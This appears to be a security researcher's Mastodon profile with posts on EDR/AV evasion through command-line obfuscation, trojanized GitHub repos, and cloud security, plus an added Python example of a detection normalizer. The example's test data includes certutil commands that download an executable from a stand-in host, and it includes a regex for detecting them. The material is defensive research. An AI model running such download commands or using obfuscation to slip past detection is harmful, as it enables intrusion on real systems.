Christophe 

1.2K Followers
147 Following
304 Posts
• Cloud and container security
• Security research and open source at Datadog
🇨🇭🇫🇷
Website: https://christophetd.fr
GitHub: https://github.com/christophetd
Twitter: 🪦
@moritz thank you, this was a useful read! I'm watching your repo closely 👀
@jerry Looks like it's back now!
@talsk Just seeing this now. You're a legend
@jerry Oh no! I hope you're wrong about this
@cfp_time FYI your website seems down at the moment
@wietze This is so cool! Love ArgFuscator, would be cool to allow for an OS filter to generate commands working for Linux/Windows/Mac

By making minor changes to command-line arguments, it is possible to bypass EDR/AV detections.

My research, comprising ~70 Windows executables, found that all of them were vulnerable to this, to varying degrees.

Here’s what I found and why it matters 👉 https://wietze.github.io/blog/bypassing-detections-with-command-line-obfuscation

Bypassing Detections with Command-Line Obfuscation

Defensive tools like AVs and EDRs rely on command-line arguments for detecting malicious activity. This post demonstrates how command-line obfuscation, a shell-independent technique that exploits executables’ parsing “flaws”, can bypass such detections. It also introduces ArgFuscator, a new tool that documents obfuscation opportunities and generates obfuscated command lines.
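As an added example (not code from wietze's post or from ArgFuscator), the Python below shows why a detection rule that string-matches the raw command line is brittle, and what a normalization step in front of the rule buys. It assumes four parser tolerances that this class of obfuscation exploits: inserted double quotes that the tokenizer discards, case-insensitive option names, `/` and `-` accepted interchangeably as a switch prefix, and redundant whitespace. Which of those a given executable actually accepts differs per binary, which is exactly the per-executable behaviour the research catalogues; the command lines and the `example.invalid` host are constructed for the example.

```python
import re

# Rule written against the canonical spelling of the command line.
# The naive detector applies it to the raw command line; the normalized
# detector first folds away the parser-tolerated variations assumed below.
RULE = re.compile(r"certutil(?:\.exe)?\s+-urlcache\s+-split\s+-f\s+https?://")


def normalize(cmdline: str) -> str:
    """Fold away the variations this example assumes the executable's
    parser tolerates. A real binary may accept more or fewer of them,
    so a production normalizer has to be built per executable."""
    s = cmdline.replace('"', "")           # assumed: inserted quotes are dropped by the tokenizer
    s = s.lower()                          # assumed: option names are case-insensitive
    s = re.sub(r"\s+", " ", s).strip()     # assumed: extra whitespace is ignored
    s = re.sub(r" /(?=[a-z])", " -", s)    # assumed: '/' and '-' are equivalent switch prefixes
    return s


def naive_detect(cmdline: str) -> bool:
    """String match on the raw command line, as a weak rule would do."""
    return RULE.search(cmdline) is not None


def normalized_detect(cmdline: str) -> bool:
    """The same rule applied after normalization."""
    return RULE.search(normalize(cmdline)) is not None


# Constructed sample command lines (not taken from the post). The bool says
# whether an analyst would consider the activity worth alerting on.
SAMPLES = [
    ("certutil.exe -urlcache -split -f http://example.invalid/a.exe a.exe", True),
    ("CERTUTIL.EXE  /URLcache /split   /f http://example.invalid/a.exe a.exe", True),
    ('certutil.exe -url"cache" -split -f http://example.invalid/a.exe a.exe', True),
    ("certutil.exe -hashfile a.exe SHA256", False),
]


def evaluate(samples=SAMPLES):
    """Return (naive_hits, normalized_hits, expected_hits) over the samples."""
    naive = sum(naive_detect(c) for c, _ in samples)
    norm = sum(normalized_detect(c) for c, _ in samples)
    expected = sum(m for _, m in samples)
    return naive, norm, expected


if __name__ == "__main__":
    for cmd, malicious in SAMPLES:
        print(f"naive={naive_detect(cmd)!s:5} normalized={normalized_detect(cmd)!s:5} "
              f"malicious={malicious} {cmd}")
    print("naive/normalized/expected hits:", evaluate())
```

On these samples the raw-string rule fires only on the canonical spelling (1 of 3 malicious lines) while the normalized rule fires on all 3 and still leaves the benign `-hashfile` invocation alone. The caveat cuts both ways: normalization that is looser than the real parser (folding something the binary would actually reject) buys false positives, and normalization that is tighter than the real parser leaves gaps, so the folding rules have to be derived from each executable's observed parsing behaviour rather than guessed.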

New research: We've been monitoring a threat actor publishing dozens of trojanized GitHub repositories targeting threat actors, leaking hundreds of thousands of credentials along the way

https://securitylabs.datadoghq.com/articles/mut-1244-targeting-offensive-actors/

Getting a taste of your own medicine: Threat actor MUT-1244 targets offensive actors, leaking hundreds of thousands of credentials | Datadog Security Labs

This post describes an in-depth investigation by Datadog security researchers into a threat actor dubbed MUT-1244, which targets other malicious actors as well as security practitioners and academics.

Some interesting research by my colleague @christophetd on default service accounts in GCP. Looks at how default rights can be in place and some of the risks to GKE environments.

https://securitylabs.datadoghq.com/articles/google-cloud-default-service-accounts/

Exploring Google Cloud Default Service Accounts: Deep Dive and Real-World Adoption Trends | Datadog Security Labs

This post offers a deep dive into Google Cloud’s default service accounts, explaining their functionality, risks, and real-world adoption trends.

New blog post: A SaaS provider's guide to securely integrating with customers' AWS accounts

https://securitylabs.datadoghq.com/articles/securely-integrating-with-customers-aws-accounts/

A SaaS provider's guide to securely integrating with customers' AWS accounts | Datadog Security Labs

An opinionated guide to securing third-party AWS integrations